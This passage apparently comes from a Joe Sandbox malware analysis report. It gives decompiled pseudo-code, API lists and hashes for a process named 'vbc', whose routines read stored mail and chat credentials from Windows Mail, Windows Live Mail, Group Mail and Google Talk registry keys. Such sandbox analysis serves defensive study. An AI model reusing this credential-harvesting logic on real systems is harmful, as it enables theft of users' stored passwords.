                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412155
                                                                                                                                                                        0x0041214e
                                                                                                                                                                        0x00412143
                                                                                                                                                                        0x00412183
                                                                                                                                                                        0x00412188
                                                                                                                                                                        0x0041218f
                                                                                                                                                                        0x00412196
                                                                                                                                                                        0x0041219d
                                                                                                                                                                        0x004121a3
                                                                                                                                                                        0x004121a9
                                                                                                                                                                        0x004121ab
                                                                                                                                                                        0x004121b1
                                                                                                                                                                        0x004121b7
                                                                                                                                                                        0x004121c0
                                                                                                                                                                        0x004121c5
                                                                                                                                                                        0x004121ca
                                                                                                                                                                        0x004121d0
                                                                                                                                                                        0x004121d7
                                                                                                                                                                        0x004121dd
                                                                                                                                                                        0x004121dd
                                                                                                                                                                        0x004121de
                                                                                                                                                                        0x004121e3
                                                                                                                                                                        0x004121e8
                                                                                                                                                                        0x004121ed
                                                                                                                                                                        0x004121f2
                                                                                                                                                                        0x004121f7
                                                                                                                                                                        0x00412216
                                                                                                                                                                        0x00412219
                                                                                                                                                                        0x0041221e
                                                                                                                                                                        0x00412223
                                                                                                                                                                        0x00412230
                                                                                                                                                                        0x00412232
                                                                                                                                                                        0x00412238
                                                                                                                                                                        0x00412274
                                                                                                                                                                        0x00412274
                                                                                                                                                                        0x00412277
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412279
                                                                                                                                                                        0x0041227a
                                                                                                                                                                        0x0041227a
                                                                                                                                                                        0x0041223a
                                                                                                                                                                        0x0041223a
                                                                                                                                                                        0x0041223a
                                                                                                                                                                        0x0041223b
                                                                                                                                                                        0x0041223e
                                                                                                                                                                        0x00412240
                                                                                                                                                                        0x0041224b
                                                                                                                                                                        0x0041224d
                                                                                                                                                                        0x0041224d
                                                                                                                                                                        0x0041224e
                                                                                                                                                                        0x0041224e
                                                                                                                                                                        0x0041224b
                                                                                                                                                                        0x00412251
                                                                                                                                                                        0x00412251
                                                                                                                                                                        0x00412255
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041225b
                                                                                                                                                                        0x00412262
                                                                                                                                                                        0x00412268
                                                                                                                                                                        0x0041226c
                                                                                                                                                                        0x00412281
                                                                                                                                                                        0x0041226e
                                                                                                                                                                        0x0041226e
                                                                                                                                                                        0x0041226e
                                                                                                                                                                        0x00412289
                                                                                                                                                                        0x0041228e
                                                                                                                                                                        0x00412290
                                                                                                                                                                        0x00412296
                                                                                                                                                                        0x00412299
                                                                                                                                                                        0x00412299
                                                                                                                                                                        0x0041229f
                                                                                                                                                                        0x004122d4
                                                                                                                                                                        0x004122df

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID:
• API String ID: 3662548030-0
• Opcode ID: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
• Instruction ID: c2e845550ef1ad64eb6aea8f75856b2ed0c0391cefdfa0dcc66b3553e8bd0076
• Opcode Fuzzy Hash: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
• Instruction Fuzzy Hash: 46419070D04249EFCB209FA4D9496ED7BB4EB09315F2081BBE861D7291D7B859D2CB1C
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 92%
E004113C4(void* __eflags, intOrPtr _a4) {
	void _v275;
	char _v276;
	char _v532;
	void _v539;
	char _v540;
	void _v795;
	char _v796;
	void* __edi;
	void* __esi;
	int _t44;
	char* _t46;
	char* _t48;
	void* _t64;
	intOrPtr _t65;
	void* _t66;
	signed int _t68;
	void* _t74;
	void* _t75;

	_t75 = __eflags;
	_v796 = 0;
	memset( &_v795, 0, 0x104);
	_t64 = 0x1c;
	_t61 =  &_v796;
	 *((intOrPtr*)(_a4 + 4)) = 1;
	E0040F4CA( &_v796, _t64); // executed
	E00406763( &_v796, "\\Microsoft\\Windows Mail");
	_t65 = _a4;
	E004112EC(_t65, _t75, _t61); // executed
	 *((intOrPtr*)(_t65 + 4)) = 2;
	_t66 = 0x1c;
	E0040F4CA(_t61, _t66);
	E00406763(_t61, "\\Microsoft\\Windows Live Mail");
	E004112EC(_a4, _t75, _t61); // executed
	_v276 = 0;
	memset( &_v275, 0, 0x104);
	_v540 = 0;
	memset( &_v539, 0, 0x104);
	E0040F232(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
	_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
	ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
	_t44 = strlen( &_v540);
	if(_t44 > 0) {
		_t48 = _t74 + _t44 + 0x117;
		if( *_t48 == 0x5c) {
			 *_t48 = 0;
		}
	}
	_push( &_v532);
	_t46 =  &_v796;
	_push(_t46);
	L00412072();
	_t78 = _t46;
	if(_t46 != 0) {
		_t46 = E004112EC(_a4, _t78,  &_v532); // executed
	}
	return _t46;
}
Instruction addresses for the decompiled lines above: 0x004113c4, 0x004113e0, 0x004113e5, 0x004113f2, 0x004113f3, 0x004113f7, 0x004113fe, 0x00411408, 0x0041140d, 0x00411416, 0x0041141b, 0x00411424, 0x00411425, 0x0041142f
                                                                                                                                                                        0x0041143b
                                                                                                                                                                        0x0041144b
                                                                                                                                                                        0x00411453
                                                                                                                                                                        0x00411466
                                                                                                                                                                        0x0041146e
                                                                                                                                                                        0x0041148e
                                                                                                                                                                        0x00411493
                                                                                                                                                                        0x004114a7
                                                                                                                                                                        0x004114b5
                                                                                                                                                                        0x004114bd
                                                                                                                                                                        0x004114bf
                                                                                                                                                                        0x004114c9
                                                                                                                                                                        0x004114cb
                                                                                                                                                                        0x004114cb
                                                                                                                                                                        0x004114c9
                                                                                                                                                                        0x004114d5
                                                                                                                                                                        0x004114d6
                                                                                                                                                                        0x004114da
                                                                                                                                                                        0x004114db
                                                                                                                                                                        0x004114e0
                                                                                                                                                                        0x004114e4
                                                                                                                                                                        0x004114f1
                                                                                                                                                                        0x004114f1
                                                                                                                                                                        0x004114fc

APIs
• memset.MSVCRT ref: 004113E5
  • Part of subcall function 00406763: strlen.MSVCRT ref: 00406765
  • Part of subcall function 00406763: strlen.MSVCRT ref: 00406770
  • Part of subcall function 00406763: strcat.MSVCRT(00000000,0041140D,0000001C,0041140D,\Microsoft\Windows Mail,?,?,?), ref: 00406787
  • Part of subcall function 0040F4CA: memset.MSVCRT ref: 0040F51F
  • Part of subcall function 0040F4CA: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
  • Part of subcall function 0040F4CA: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
• memset.MSVCRT ref: 00411453
• memset.MSVCRT ref: 0041146E
  • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004114A7
• strlen.MSVCRT ref: 004114B5
• _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 004114DB
Strings
• Software\Microsoft\Windows Live Mail, xrefs: 00411484
• \Microsoft\Windows Mail, xrefs: 00411403
• \Microsoft\Windows Live Mail, xrefs: 0041142A
• Store Root, xrefs: 0041147F
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 4071991895-2578778931
• Opcode ID: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
• Instruction ID: e9664ad0f3b84b924b74ee59ba002f7e9f43dcf230935329a4dad2143823624c
• Opcode Fuzzy Hash: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
• Instruction Fuzzy Hash: 45317772504348ABD320EBA9DD46FCB7BDC9B88714F00442FF649D7182EA78D55487AA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 308 40378b-4037dd memset * 2 call 411622 311 4038a3-4038a6 308->311 312 4037e3-403843 call 402197 call 4060da * 2 strchr 308->312 319 403845-403856 strcpy 312->319 320 403858-403863 strlen 312->320 321 403880-40389e strcpy call 4023c6 319->321 320->321 322 403865-40387d sprintf 320->322 321->311 322->321
C-Code - Quality: 76%
			E0040378B(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00411622(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E00402197( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060DA(_t50,  &_v276);
				_t59 =  &_v404;
				E004060DA(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E004023C6( &_v936, _t70, _a4);
			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004037AC
                                                                                                                                                                        • memset.MSVCRT ref: 004037C0
                                                                                                                                                                          • Part of subcall function 00411622: memset.MSVCRT ref: 00411644
                                                                                                                                                                          • Part of subcall function 00411622: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                                                                                                                                                                          • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                          • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                        • strchr.MSVCRT ref: 0040382F
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040384C
                                                                                                                                                                        • strlen.MSVCRT ref: 00403858
                                                                                                                                                                        • sprintf.MSVCRT ref: 00403878
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040388E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                        • String ID: %s@yahoo.com
                                                                                                                                                                        • API String ID: 1649821605-3288273942
                                                                                                                                                                        • Opcode ID: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                                                                                                                                                                        • Instruction ID: fac56a1422f5c84d721e9c9d17906f33e473bda0e694fa5a8ecc328811f6b8f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                                                                                                                                                                        • Instruction Fuzzy Hash: 952186B3D0012C6EDB21EA54DD41BDA77AC9F45348F0401EBF649F6181E6B8AF848F69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 324 4034a5-403505 memset * 2 call 40f232 327 403541-403543 324->327 328 403507-403540 strcpy call 405f29 strcat call 4033b1 324->328 328->327
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004034A5(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                        				void _v267;
                                                                                                                                                                        				char _v268;
                                                                                                                                                                        				void _v531;
                                                                                                                                                                        				char _v532;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t15;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				char* _t28;
                                                                                                                                                                        
                                                                                                                                                                        				_t23 = __ecx;
                                                                                                                                                                        				_v532 = 0;
                                                                                                                                                                        				memset( &_v531, 0, 0x104);
                                                                                                                                                                        				_v268 = 0;
                                                                                                                                                                        				memset( &_v267, 0, 0x104);
                                                                                                                                                                        				_t15 = E0040F232(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
                                                                                                                                                                        				if(_t15 != 0) {
                                                                                                                                                                        					strcpy( &_v268,  &_v532);
                                                                                                                                                                        					_t28 =  &_v268;
                                                                                                                                                                        					E00405F29(_t28);
                                                                                                                                                                        					strcat(_t28, "fb.dat");
                                                                                                                                                                        					return E004033B1(_t28, __fp0, _a4);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t15;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004034C5
                                                                                                                                                                        • memset.MSVCRT ref: 004034DB
                                                                                                                                                                          • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                        • strcpy.MSVCRT(00000000,00000000), ref: 00403516
                                                                                                                                                                          • Part of subcall function 00405F29: strlen.MSVCRT ref: 00405F2A
                                                                                                                                                                          • Part of subcall function 00405F29: strcat.MSVCRT(00000000,00414078,004062C9,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 00405F41
                                                                                                                                                                        • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 0040352E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetstrcat$Closestrcpystrlen
                                                                                                                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                        • API String ID: 1387626053-966475738
                                                                                                                                                                        • Opcode ID: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                                                                                                                                                                        • Instruction ID: 36ed55b5d374e154850240320204e9d1b3c473ccad1168af83c786b56a3c059d
                                                                                                                                                                        • Opcode Fuzzy Hash: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                                                                                                                                                                        • Instruction Fuzzy Hash: 8201D8B294012879D720E655DD46FCA7A6C5F34745F0000E6BA48F21C2DAFCABD58B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 333 40b91e-40b94d ??2@YAPAXI@Z 334 40b956 333->334 335 40b94f-40b954 333->335 336 40b958-40b96b ??2@YAPAXI@Z 334->336 335->336 337 40b976 336->337 338 40b96d-40b974 call 404026 336->338 340 40b978-40b99e 337->340 338->340 342 40b9a0-40b9a7 DeleteObject 340->342 343 40b9ad-40ba20 call 40625c call 4019da memset LoadIconA call 4019da strcpy 340->343 342->343
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E0040B91E(intOrPtr __eax, intOrPtr* __ebx) {
                                                                                                                                                                        				struct HICON__* _v8;
                                                                                                                                                                        				void _v263;
                                                                                                                                                                        				char _v264;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				struct HICON__* _t28;
                                                                                                                                                                        				intOrPtr* _t35;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        
                                                                                                                                                                        				_t35 = __ebx;
                                                                                                                                                                        				_t21 = __eax;
                                                                                                                                                                        				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                                                                                                                                        				 *__ebx = 0x41457c;
                                                                                                                                                                        				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                                                                                                                                        				_push(0x14);
                                                                                                                                                                        				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				if(__eax == 0) {
                                                                                                                                                                        					_t21 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					 *0x418114 = __eax;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((intOrPtr*)(_t35 + 0x36c)) = _t21;
                                                                                                                                                                        				L00412090(); // executed
                                                                                                                                                                        				_t49 = _t21;
                                                                                                                                                                        				_t37 = 0xf38;
                                                                                                                                                                        				if(_t21 == 0) {
                                                                                                                                                                        					_t22 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t22 = E00404026(_t21, _t49);
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((intOrPtr*)(_t35 + 0x370)) = _t22;
                                                                                                                                                                        				 *((intOrPtr*)(_t35 + 0x378)) = 0;
                                                                                                                                                                        				 *((intOrPtr*)(_t35 + 0x260)) = 0;
                                                                                                                                                                        				 *((intOrPtr*)(_t35 + 0x25c)) = 0;
                                                                                                                                                                        				 *((intOrPtr*)(_t35 + 0x154)) = 0;
                                                                                                                                                                        				_t23 =  *(_t35 + 0x258);
                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                        					DeleteObject(_t23);
                                                                                                                                                                        					 *(_t35 + 0x258) = 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t24 = E0040625C(); // executed
                                                                                                                                                                        				 *(_t35 + 0x258) = _t24;
                                                                                                                                                                        				E004019DA(_t37, _t35 + 0x158, 0x414490);
                                                                                                                                                                        				_v264 = 0;
                                                                                                                                                                        				memset( &_v263, 0, 0xff);
                                                                                                                                                                        				_t28 = LoadIconA( *0x417b94, 0x65); // executed
                                                                                                                                                                        				_v8 = _t28;
                                                                                                                                                                        				strcpy(_t35 + 4, E004019DA(_t37,  &_v264, 0x414478));
                                                                                                                                                                        				 *(_t35 + 0x104) = _v8;
                                                                                                                                                                        				return _t35;
                                                                                                                                                                        			}

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$DeleteIconLoadObjectmemsetstrcpy
• String ID:
• API String ID: 3205015851-0
• Opcode ID: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
• Instruction ID: 1611dc68708d9a603d76385fea93fddb5fcd3a07b13b65f331774950c43fbb3a
• Opcode Fuzzy Hash: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
• Instruction Fuzzy Hash: 9C2192F19002509BCB50EF758E897C97BA8AB44705F1444BBEE0CEF296D7B845818BAD
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 96%
E004076B7(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
    void* _v0;
    char _v4;
    long _t29;
    void* _t33;
    void* _t36;
    signed int _t54;
    void* _t56;
    void* _t57;
    void* _t58;

    _t50 = __ecx;
    E00412360(0x1110, __ecx);
    E004073B6(_a4); // executed
    _t29 = E0040F1B0(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
    _t56 = (_t54 & 0xfffffff8) + 0xc;
    if(_t29 == 0) {
        _a4 = 0;
        _a12 = 0;
        memset( &_a13, 0, 0xff);
        _t57 = _t56 + 0xc;
        _t33 = E0040F276(_v0, 0,  &_a12);
        while(1) {
            _t58 = _t57 + 0xc;
            if(_t33 != 0) {
                break;
            }
            _t36 = E0040F1B0(_v0,  &_a12,  &_a8);
            _t57 = _t58 + 0xc;
            if(_t36 == 0) {
                _a268 = 0;
                memset( &_a269, 0, 0xfff);
                E0040F1F1(0xfff, _t50, _a8, "pw",  &_a268);
                _t57 = _t57 + 0x18;
                E00407570( &_a268, _a4,  &_a12);
                RegCloseKey(_v0);
            }
            _a4 = _a4 + 1;
            _t33 = E0040F276(_v0, _a4,  &_a12);
        }
        _t29 = RegCloseKey(_v0);
    }
    return _t29;
}

APIs
  • Part of subcall function 004073B6: memset.MSVCRT ref: 00407418
  • Part of subcall function 004073B6: memset.MSVCRT ref: 0040742C
  • Part of subcall function 004073B6: memset.MSVCRT ref: 00407446
  • Part of subcall function 004073B6: memset.MSVCRT ref: 0040745B
  • Part of subcall function 004073B6: GetComputerNameA.KERNEL32 ref: 0040747D
  • Part of subcall function 004073B6: GetUserNameA.ADVAPI32(?,?), ref: 00407491
  • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
  • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
  • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074CE
  • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074DD
  • Part of subcall function 004073B6: memcpy.MSVCRT ref: 004074EF
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 00407705
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• memset.MSVCRT ref: 00407756
• RegCloseKey.ADVAPI32(?,?,?), ref: 00407794
• RegCloseKey.ADVAPI32(?), ref: 004077BB
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004076D6
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 2959138223-1079885057
• Opcode ID: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
• Instruction ID: a99152f29cb3baba476c483fa4670b136c65b11177ef5495e630776d68c42b47
• Opcode Fuzzy Hash: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
• Instruction Fuzzy Hash: 93219471408209BED610DE51DD42EABBBECEF84344F00043AB944D1192E635DD5D9BA7
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 373 40a6c6-40a6d8 374 40a725-40a739 call 405e36 373->374 375 40a6da-40a6f0 call 406f55 _mbsicmp 373->375 397 40a73b call 40f1b0 374->397 398 40a73b call 40ef05 374->398 399 40a73b call 403c17 374->399 400 40a73b call 4047aa 374->400 401 40a73b call 4047fb 374->401 380 40a6f2-40a70b call 406f55 375->380 381 40a719-40a723 375->381 386 40a712 380->386 387 40a70d-40a710 380->387 381->374 381->375 382 40a73e-40a751 call 406f65 390 40a753-40a75f 382->390 391 40a798-40a7a7 SetCursor 382->391 389 40a713-40a714 call 40a283 386->389 387->389 389->381 393 40a761-40a76c 390->393 394 40a776-40a795 qsort 390->394 393->394 394->391 397->382 398->382 399->382 400->382 401->382
                                                                                                                                                                        C-Code - Quality: 64%
E0040A6C6(void* __eax) {
	void* __esi;
	_Unknown_base(*)()* _t26;
	void* _t31;
	intOrPtr _t34;
	char* _t44;
	void* _t45;
	intOrPtr* _t46;
	int _t47;

	_t45 = __eax;
	_t37 = *((intOrPtr*)(__eax + 0x37c));
	_t47 = 0;
	if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
		do {
			_t31 = E00406F55(_t47, _t37);
			_push(_t31);
			_push("/sort");
			L0041207E();
			if(_t31 == 0) {
				_t4 = _t47 + 1; // 0x1
				_t44 = E00406F55(_t4, *((intOrPtr*)(_t45 + 0x37c)));
				_t54 = *_t44 - 0x7e;
				_t34 = *((intOrPtr*)(_t45 + 0x370));
				if( *_t44 != 0x7e) {
					_push(0);
				} else {
					_push(1);
					_t44 = _t44 + 1;
				}
				_push(_t44);
				E0040A283(_t34, _t54);
			}
			_t37 = *((intOrPtr*)(_t45 + 0x37c));
			_t47 = _t47 + 1;
		} while (_t47 < *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
	}
	E00405E36();
	*((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
	*((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
	if(E00406F65( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
		_t46 = *((intOrPtr*)(_t45 + 0x370));
		if( *0x41848c == 0) {
			*0x418490 = *((intOrPtr*)(_t46 + 0x1ac));
			*0x41848c = 1;
		}
		_t26 = *((intOrPtr*)( *_t46 + 0x60))(E0040A25D);
		qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0, *(_t46 + 0x28), _t26);
	}
	return SetCursor( *0x417b98);
}
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
• Instruction ID: d235f9a75b77abe912022d820ae93ced97f95949ab3107a8ace45c524b087071
• Opcode Fuzzy Hash: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
• Instruction Fuzzy Hash: 5421C170704602EFC719EF75C884A95B7A9FF48314B10413EF529A7291DB39AC218B8A
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 402 40f4ca-40f4e1 call 40f41d 405 40f4e3-40f4ec call 406282 402->405 406 40f50c-40f52a memset 402->406 414 40f4fd-40f500 405->414 415 40f4ee-40f4f1 405->415 408 40f536-40f544 406->408 409 40f52c-40f52f 406->409 412 40f554-40f55e call 40f1b0 408->412 409->408 411 40f531-40f534 409->411 411->408 416 40f546-40f54f 411->416 419 40f560-40f588 call 40f44c call 40f1f1 RegCloseKey 412->419 420 40f58e-40f5a1 strcpy 412->420 422 40f507 414->422 415->406 418 40f4f3-40f4f6 415->418 416->412 418->406 421 40f4f8-40f4fb 418->421 419->420 424 40f5a4-40f5a6 420->424 421->406 421->414 422->424

C-Code - Quality: 25%
E0040F4CA(char* __edi, void* __esi) {
	void* _v8;
	char _v40;
	void _v299;
	char _v300;
	void* _t32;
	char* _t37;
	void* _t38;

	_t38 = __esi;
	_t37 = __edi;
	E0040F41D();
	if( *0x41851c == 0 || *((intOrPtr*)(E00406282() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
		_v300 = 0;
		memset( &_v299, 0, 0x103);
		if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
			_push( &_v8);
			_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
			_push(0x80000002);
		} else {
			_push( &_v8);
			_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
			_push(0x80000001);
		}
		if(E0040F1B0() == 0) {
			E0040F44C(_t38);
